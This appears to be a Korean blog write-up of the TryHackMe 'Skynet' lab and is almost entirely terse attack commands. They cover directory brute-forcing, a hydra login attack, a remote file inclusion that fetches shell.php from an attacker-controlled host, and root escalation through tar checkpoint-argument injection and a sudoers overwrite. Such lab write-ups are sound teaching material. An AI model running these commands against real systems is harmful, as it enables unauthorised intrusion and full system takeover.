System/침투

THM - Offensive Pentesting-Skynet

병뚜 2023. 10. 24. 16:50

https://tryhackme.com/room/skynet

 

gobuster dir -u http://10.10.83.54/ -w /usr/share/wordlists/dirb/common.txt 

 

hydra 10.10.83.54 -l milesdyson -P ./log1.txt http-post-form '/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect' -V

 

smbclient //10.10.83.54/anonymous

 

10.10.83.54/squirrelmail

<Mail>

milesdyson

cyborg007haloterminator

 

smbclient //10.10.83.54/milesdyson -U milesdyson

password : )s{A&2Z=F^n_E.B`

 

gobuster dir -u http://10.10.83.54/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt 

 

searchsploit cuppa cms

searchsploit -m php/webapps/25971.txt (읽어보기)

 

http://10.10.83.54/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.176.117:8888/shell.php

 

#쉘이 불안정하기에, 대화형 쉘로 변경

python -c 'import pty;pty.spawn("/bin/bash")'

 

아무튼, backup.sh 내용

tar를 이용하는데, https://gtfobins.github.io/gtfobins/tar/에서 tar로 할 수 있는 행위를 볼수있음

 

# sudoers 파일 수정, 패스워드 없이 root권한으로 sudo 가능

echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers 

echo "/var/www/html"  > "--checkpoint-action=exec=sh root.sh"

echo "/var/www/html"  > --checkpoint=1

 

#권한상승

sudo bash